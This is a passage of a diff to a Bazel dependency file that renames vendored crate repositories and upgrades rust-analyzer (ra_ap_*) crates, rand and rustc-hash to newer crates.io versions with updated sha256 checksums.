Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_cfg-0.0.258", - sha256 = "921e2b0232d1e8352eb9f476bb55c1d8bcbed0531adc17c74aa711fef015c851", + name = "vendor_ts__ra_ap_base_db-0.0.266", + sha256 = "5d8e4a327f1a8ace5afced54ebaa1a34f8cf0bb535a28aefb8300e8ea49a7d6e", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_cfg/0.0.258/download"], - strip_prefix = 
"ra_ap_cfg-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_cfg-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_base_db/0.0.266/download"], + strip_prefix = "ra_ap_base_db-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_base_db-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_edition-0.0.258", - sha256 = "a7cc6633305d878cafb4a4482e7e7002d1a5d7b15fa837728b6613ff5336f8a4", + name = "vendor_ts__ra_ap_cfg-0.0.266", + sha256 = "4d974450788b1f90243c5f2231875ed4d7087444975c0190a1c2cb02c3ed465d", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_edition/0.0.258/download"], - strip_prefix = "ra_ap_edition-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_edition-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_cfg/0.0.266/download"], + strip_prefix = "ra_ap_cfg-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_cfg-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_hir-0.0.258", - sha256 = "6e3f6b31381a297e5bb4fa76108a2cf7bf8d35067a130f932aa6fdfb733ba3a1", + name = "vendor_ts__ra_ap_edition-0.0.266", + sha256 = "c3b1b961a84cb09a4e06e44d06b2e77bcf546d0c2623df9545ba9cc694880989", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_hir/0.0.258/download"], - strip_prefix = "ra_ap_hir-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_edition/0.0.266/download"], + strip_prefix = "ra_ap_edition-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_edition-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_hir_def-0.0.258", - sha256 = "84144bdda7af170e660d312982889622f4a5361c1bb74df2afa2a6ce17d48644", + name = "vendor_ts__ra_ap_hir-0.0.266", + sha256 = 
"ff0672e35a6cf12333cb6b9e3fd18aba4bc724fa7c7b24c3253df4730be1f9c3", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_hir_def/0.0.258/download"], - strip_prefix = "ra_ap_hir_def-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_def-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_hir/0.0.266/download"], + strip_prefix = "ra_ap_hir-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_hir_expand-0.0.258", - sha256 = "441661b394acfa4f3ac4cb54386f8ee8b451504ec167b0bf0e4200da1bbca50d", + name = "vendor_ts__ra_ap_hir_def-0.0.266", + sha256 = "fde2fb9361257e31e73e63eb2d07445ea3fd4cd1e7bae7f45e7ba82bcfcde29a", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_hir_expand/0.0.258/download"], - strip_prefix = "ra_ap_hir_expand-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_expand-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_hir_def/0.0.266/download"], + strip_prefix = "ra_ap_hir_def-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_def-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_hir_ty-0.0.258", - sha256 = "6feea30dff289f33a8ed76172ff4cb299db22d224f88735aa2c7f49ba1e5e77f", + name = "vendor_ts__ra_ap_hir_expand-0.0.266", + sha256 = "1823b649710bf1829c894f774dfe66acb33a3e5bc7409ff7836cd19f6e09c250", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_hir_ty/0.0.258/download"], - strip_prefix = "ra_ap_hir_ty-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_ty-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_hir_expand/0.0.266/download"], + strip_prefix = "ra_ap_hir_expand-0.0.266", + build_file = 
Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_expand-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_ide_db-0.0.258", - sha256 = "7e33bd5a0139b6c74d34ed963494115abe3f9c95cf5936871ab3d9b548ccbbdf", + name = "vendor_ts__ra_ap_hir_ty-0.0.266", + sha256 = "72a591a02787bd2e938c25fceb1f831d0929b9c08726e6d831f85c4a9fba04b5", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_ide_db/0.0.258/download"], - strip_prefix = "ra_ap_ide_db-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_ide_db-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_hir_ty/0.0.266/download"], + strip_prefix = "ra_ap_hir_ty-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_ty-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_intern-0.0.258", - sha256 = "faa7ee24ae9bf4d2536ef7fb6de35f30856edbf7b3d6ac02e5a2532118896569", + name = "vendor_ts__ra_ap_ide_db-0.0.266", + sha256 = "c74386061453edc3ebfd52141c7c3cde109a7427faff9792a303c3c09a762a01", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_intern/0.0.258/download"], - strip_prefix = "ra_ap_intern-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_intern-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_ide_db/0.0.266/download"], + strip_prefix = "ra_ap_ide_db-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_ide_db-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_limit-0.0.258", - sha256 = "90d8a2aecbd488cf79b430bd5abe6650da44ae58b31cd6052c909dbd3f5d5926", + name = "vendor_ts__ra_ap_intern-0.0.266", + sha256 = "8239ffde688b558a4335f03d14fa42dcebb203f452367830554b18e17ff1c683", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_limit/0.0.258/download"], - strip_prefix = "ra_ap_limit-0.0.258", - build_file = 
Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_limit-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_intern/0.0.266/download"], + strip_prefix = "ra_ap_intern-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_intern-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_load-cargo-0.0.258", - sha256 = "6e2372aadd32e85460de595891c8b3562126166bc94fdc24508d6784c9d93357", + name = "vendor_ts__ra_ap_load-cargo-0.0.266", + sha256 = "01dd50ca287042b06ca3cc62b60e6891bacee3886d39381d26f9f966e509b1c7", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_load-cargo/0.0.258/download"], - strip_prefix = "ra_ap_load-cargo-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_load-cargo-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_load-cargo/0.0.266/download"], + strip_prefix = "ra_ap_load-cargo-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_load-cargo-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_mbe-0.0.258", - sha256 = "bf69ba82adb6e436617ecd09c0ff58006f376060dff437eb9fd383c2983f6d01", + name = "vendor_ts__ra_ap_mbe-0.0.266", + sha256 = "c193592a0d1dcd315cf8c60f25d37a15c6b50c2b58bfbc6eac38b123e45c8c21", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_mbe/0.0.258/download"], - strip_prefix = "ra_ap_mbe-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_mbe-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_mbe/0.0.266/download"], + strip_prefix = "ra_ap_mbe-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_mbe-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_parser-0.0.258", - sha256 = "8f499b6c33a588d60ed9722d057954a21ec01913b97a5693ff40ba4828ffa7b9", + name = "vendor_ts__ra_ap_parser-0.0.266", + sha256 = 
"b380f96951dd56b8231eeb47884fea12c57b8515ac748eedd590b26cd156681c", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_parser/0.0.258/download"], - strip_prefix = "ra_ap_parser-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_parser-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_parser/0.0.266/download"], + strip_prefix = "ra_ap_parser-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_parser-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_paths-0.0.258", - sha256 = "b5a16df131fa641a4af4d9488152b7b332a6a30e93bc655fdbe88f555ba28825", + name = "vendor_ts__ra_ap_paths-0.0.266", + sha256 = "0801105582f532bc59a2b5714a30966c4cf9bd3e5b66f4161763c1d974d2c7d5", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_paths/0.0.258/download"], - strip_prefix = "ra_ap_paths-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_paths-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_paths/0.0.266/download"], + strip_prefix = "ra_ap_paths-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_paths-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_proc_macro_api-0.0.258", - sha256 = "3480e0d07197ebcc2db5836b0c39625e07b0d77c6471a2a748e5bdf54ce556e3", + name = "vendor_ts__ra_ap_proc_macro_api-0.0.266", + sha256 = "da377b243e376b82819f875c1c6624125d27b682a740bd4cafc30b4f496d0ffa", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_proc_macro_api/0.0.258/download"], - strip_prefix = "ra_ap_proc_macro_api-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_proc_macro_api-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_proc_macro_api/0.0.266/download"], + strip_prefix = "ra_ap_proc_macro_api-0.0.266", + build_file = 
Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_proc_macro_api-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_profile-0.0.258", - sha256 = "95b707dd9c92139030587d81b3333428f48af8f4728330ed12101ab0bb431d72", + name = "vendor_ts__ra_ap_profile-0.0.266", + sha256 = "4d6d1391bee4f86e56385438a2dcb739cbb96bd0fbf49799a492332d57e6db62", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_profile/0.0.258/download"], - strip_prefix = "ra_ap_profile-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_profile-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_profile/0.0.266/download"], + strip_prefix = "ra_ap_profile-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_profile-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_project_model-0.0.258", - sha256 = "551a0de5a16f0538fbaf401a319d81d1a034f7aa014e46ac87c5bd74229a211b", + name = "vendor_ts__ra_ap_project_model-0.0.266", + sha256 = "e8b1ac2712d5f6a20197b360890031e64b4ea097b511f50e2cb8ab1a0e24f577", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_project_model/0.0.258/download"], - strip_prefix = "ra_ap_project_model-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_project_model-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_project_model/0.0.266/download"], + strip_prefix = "ra_ap_project_model-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_project_model-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_salsa-0.0.258", - sha256 = "6ec0c82d9e5affbf7d582750b301d279589787a5ac729f95756f5a0b0bf2b4a4", + name = "vendor_ts__ra_ap_salsa-0.0.266", + sha256 = "bc3a0a272f50e2ab831452bd3f4e7f8a571ccf01282d76f4a078f661135ed0ce", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_salsa/0.0.258/download"], - 
strip_prefix = "ra_ap_salsa-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_salsa-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_salsa/0.0.266/download"], + strip_prefix = "ra_ap_salsa-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_salsa-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_salsa-macros-0.0.258", - sha256 = "8440192eb549dda1cdefc95eaa1fc42ad13cfbd303add757517d77c81e7dc2e1", + name = "vendor_ts__ra_ap_salsa-macros-0.0.266", + sha256 = "d5d59b47a54fd5468ce0dc03b146afd0932ae0f3d05a5c15ca78d29d5e85bc31", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_salsa-macros/0.0.258/download"], - strip_prefix = "ra_ap_salsa-macros-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_salsa-macros-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_salsa-macros/0.0.266/download"], + strip_prefix = "ra_ap_salsa-macros-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_salsa-macros-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_span-0.0.258", - sha256 = "18690685d10da2577d7821d46c0de5a884bf1755e59635cbb1a795451e2a4acc", + name = "vendor_ts__ra_ap_span-0.0.266", + sha256 = "f10dbdd611d2546be7c400934007865e85bb37570566c715edb3aac76367a782", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_span/0.0.258/download"], - strip_prefix = "ra_ap_span-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_span-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_span/0.0.266/download"], + strip_prefix = "ra_ap_span-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_span-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_stdx-0.0.258", - sha256 = 
"4016934faae8413b4ad3f1bf063c7ffccdcfdf3f67ff32f4a79a197a3c1cb0da", + name = "vendor_ts__ra_ap_stdx-0.0.266", + sha256 = "b7d5c58fcda9b35d61e23f334b2b11221abf53e7f5e4344fc7eb1de18b2cbf68", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_stdx/0.0.258/download"], - strip_prefix = "ra_ap_stdx-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_stdx-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_stdx/0.0.266/download"], + strip_prefix = "ra_ap_stdx-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_stdx-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_syntax-0.0.258", - sha256 = "e8e381d21d166d12b11906171f82382473d60abfead0c4acc6d7d07150f87f73", + name = "vendor_ts__ra_ap_syntax-0.0.266", + sha256 = "75334f45a8095223823ef1d2789c085460b7b9368c63a6430d46f6f2b9bd5cb5", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_syntax/0.0.258/download"], - strip_prefix = "ra_ap_syntax-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_syntax-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_syntax/0.0.266/download"], + strip_prefix = "ra_ap_syntax-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_syntax-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_syntax-bridge-0.0.258", - sha256 = "65f1960218acd2ed8e486e7bd24f80a7eb89591906c6b0831296b2a75c556b2f", + name = "vendor_ts__ra_ap_syntax-bridge-0.0.266", + sha256 = "b331a50f90ae587d230b1b55b3852ebf67ab740dec33c1a4b0900005037e77c2", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_syntax-bridge/0.0.258/download"], - strip_prefix = "ra_ap_syntax-bridge-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_syntax-bridge-0.0.258.bazel"), + urls = 
["https://static.crates.io/crates/ra_ap_syntax-bridge/0.0.266/download"], + strip_prefix = "ra_ap_syntax-bridge-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_syntax-bridge-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_toolchain-0.0.258", - sha256 = "c9195f69ff02f076f5a726c7fbafa2b4639d00235906cb44e52ca75cd8b33c30", + name = "vendor_ts__ra_ap_toolchain-0.0.266", + sha256 = "8d56e1b3a34eac0448e54afccf63a6b7699ef14a734b2f1b340246ccdd00c0d3", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_toolchain/0.0.258/download"], - strip_prefix = "ra_ap_toolchain-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_toolchain-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_toolchain/0.0.266/download"], + strip_prefix = "ra_ap_toolchain-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_toolchain-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_tt-0.0.258", - sha256 = "8ac261d79d3ec475a1f3b2a758d3e466f2b9d7d883fb72239b06979bf6880018", + name = "vendor_ts__ra_ap_tt-0.0.266", + sha256 = "4b974b1211e0b1e17e44b1f256ca1b4a3734d4d98f43ba09ee0a8476fc3a5b83", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_tt/0.0.258/download"], - strip_prefix = "ra_ap_tt-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_tt-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_tt/0.0.266/download"], + strip_prefix = "ra_ap_tt-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_tt-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_vfs-0.0.258", - sha256 = "ee35a171beccbb01b4ede1d9ad91dee487a3742d7cc39efd7aed6961027cbe78", + name = "vendor_ts__ra_ap_vfs-0.0.266", + sha256 = "2b004e20f901dae213cb1673111a2b56fec4f0d1c4c894b62668a0f69ce25065", type = "tar.gz", - urls = 
["https://static.crates.io/crates/ra_ap_vfs/0.0.258/download"], - strip_prefix = "ra_ap_vfs-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_vfs-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_vfs/0.0.266/download"], + strip_prefix = "ra_ap_vfs-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_vfs-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_vfs-notify-0.0.258", - sha256 = "b234b7651eb5d61f18d4f4643590bb8b1fd59ef766a1059741c09c540ec8cd86", + name = "vendor_ts__ra_ap_vfs-notify-0.0.266", + sha256 = "95f9e8df03407d76e044f99ef45fafd686d775508aa7d1ba836e9eca58b833a3", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_vfs-notify/0.0.258/download"], - strip_prefix = "ra_ap_vfs-notify-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_vfs-notify-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_vfs-notify/0.0.266/download"], + strip_prefix = "ra_ap_vfs-notify-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_vfs-notify-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__rand-0.8.5", - sha256 = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404", + name = "vendor_ts__rand-0.9.0", + sha256 = "3779b94aeb87e8bd4e834cee3650289ee9e0d5677f976ecdb6d219e5f4f6cd94", type = "tar.gz", - urls = ["https://static.crates.io/crates/rand/0.8.5/download"], - strip_prefix = "rand-0.8.5", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand-0.8.5.bazel"), + urls = ["https://static.crates.io/crates/rand/0.9.0/download"], + strip_prefix = "rand-0.9.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand-0.9.0.bazel"), ) maybe( http_archive, - name = "vendor__rand_chacha-0.3.1", - sha256 = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88", + name = 
"vendor_ts__rand_chacha-0.9.0", + sha256 = "d3022b5f1df60f26e1ffddd6c66e8aa15de382ae63b3a0c1bfc0e4d3e3f325cb", type = "tar.gz", - urls = ["https://static.crates.io/crates/rand_chacha/0.3.1/download"], - strip_prefix = "rand_chacha-0.3.1", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand_chacha-0.3.1.bazel"), + urls = ["https://static.crates.io/crates/rand_chacha/0.9.0/download"], + strip_prefix = "rand_chacha-0.9.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand_chacha-0.9.0.bazel"), ) maybe( http_archive, - name = "vendor__rand_core-0.6.4", - sha256 = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c", + name = "vendor_ts__rand_core-0.9.2", + sha256 = "7a509b1a2ffbe92afab0e55c8fd99dea1c280e8171bd2d88682bb20bc41cbc2c", type = "tar.gz", - urls = ["https://static.crates.io/crates/rand_core/0.6.4/download"], - strip_prefix = "rand_core-0.6.4", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand_core-0.6.4.bazel"), + urls = ["https://static.crates.io/crates/rand_core/0.9.2/download"], + strip_prefix = "rand_core-0.9.2", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand_core-0.9.2.bazel"), ) maybe( http_archive, - name = "vendor__rayon-1.10.0", + name = "vendor_ts__rayon-1.10.0", sha256 = "b418a60154510ca1a002a752ca9714984e21e4241e804d32555251faf8b78ffa", type = "tar.gz", urls = ["https://static.crates.io/crates/rayon/1.10.0/download"], @@ -2395,7 +2416,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__rayon-core-1.12.1", + name = "vendor_ts__rayon-core-1.12.1", sha256 = "1465873a3dfdaa8ae7cb14b4383657caab0b3e8a0aa9ae8e04b044854c8dfce2", type = "tar.gz", urls = ["https://static.crates.io/crates/rayon-core/1.12.1/download"], 
@@ -2405,7 +2426,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__redox_syscall-0.5.8", + name = "vendor_ts__redox_syscall-0.5.8", sha256 = "03a862b389f93e68874fbf580b9de08dd02facb9a788ebadaf4a3fd33cf58834", type = "tar.gz", urls = ["https://static.crates.io/crates/redox_syscall/0.5.8/download"], @@ -2415,7 +2436,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-1.11.1", + name = "vendor_ts__regex-1.11.1", sha256 = "b544ef1b4eac5dc2db33ea63606ae9ffcfac26c1416a2806ae0bf5f56b201191", type = "tar.gz", urls = ["https://static.crates.io/crates/regex/1.11.1/download"], @@ -2425,7 +2446,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-automata-0.1.10", + name = "vendor_ts__regex-automata-0.1.10", sha256 = "6c230d73fb8d8c1b9c0b3135c5142a8acee3a0558fb8db5cf1cb65f8d7862132", type = "tar.gz", urls = ["https://static.crates.io/crates/regex-automata/0.1.10/download"], @@ -2435,7 +2456,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-automata-0.4.9", + name = "vendor_ts__regex-automata-0.4.9", sha256 = "809e8dc61f6de73b46c85f4c96486310fe304c434cfa43669d7b40f711150908", type = "tar.gz", urls = ["https://static.crates.io/crates/regex-automata/0.4.9/download"], @@ -2445,7 +2466,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-syntax-0.6.29", + name = "vendor_ts__regex-syntax-0.6.29", sha256 = "f162c6dd7b008981e4d40210aca20b4bd0f9b60ca9271061b07f78537722f2e1", type = "tar.gz", urls = ["https://static.crates.io/crates/regex-syntax/0.6.29/download"], @@ -2455,7 +2476,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-syntax-0.8.5", + name = "vendor_ts__regex-syntax-0.8.5", sha256 = "2b15c43186be67a4fd63bee50d0303afffcef381492ebe2c5d87f324e1b8815c", type = "tar.gz", urls = ["https://static.crates.io/crates/regex-syntax/0.8.5/download"], 
@@ -2465,7 +2486,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__rowan-0.15.15", + name = "vendor_ts__rowan-0.15.15", sha256 = "32a58fa8a7ccff2aec4f39cc45bf5f985cec7125ab271cf681c279fd00192b49", type = "tar.gz", urls = ["https://static.crates.io/crates/rowan/0.15.15/download"], @@ -2475,7 +2496,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__rustc-hash-1.1.0", + name = "vendor_ts__rustc-hash-1.1.0", sha256 = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2", type = "tar.gz", urls = ["https://static.crates.io/crates/rustc-hash/1.1.0/download"], 
@@ -2485,17 +2506,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__rustc-hash-2.1.0", - sha256 = "c7fb8039b3032c191086b10f11f319a6e99e1e82889c5cc6046f515c9db1d497", + name = "vendor_ts__rustc-hash-2.1.1", + sha256 = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d", + type = "tar.gz", + urls = ["https://static.crates.io/crates/rustc-hash/2.1.1/download"], + strip_prefix = "rustc-hash-2.1.1", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rustc-hash-2.1.1.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__rustc-stable-hash-0.1.1", + sha256 = "2febf9acc5ee5e99d1ad0afcdbccc02d87aa3f857a1f01f825b80eacf8edfcd1", type = "tar.gz", - urls = ["https://static.crates.io/crates/rustc-hash/2.1.0/download"], - strip_prefix = "rustc-hash-2.1.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rustc-hash-2.1.0.bazel"), + urls = ["https://static.crates.io/crates/rustc-stable-hash/0.1.1/download"], + strip_prefix = "rustc-stable-hash-0.1.1", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rustc-stable-hash-0.1.1.bazel"), ) maybe( new_git_repository, - name = "vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab", + name = "vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab", commit = "096d585100636bc2e9f09d7eefec38c5b334d47b", init_submodules = True, remote = "https://github.com/redsun82/rustc_apfloat.git", 
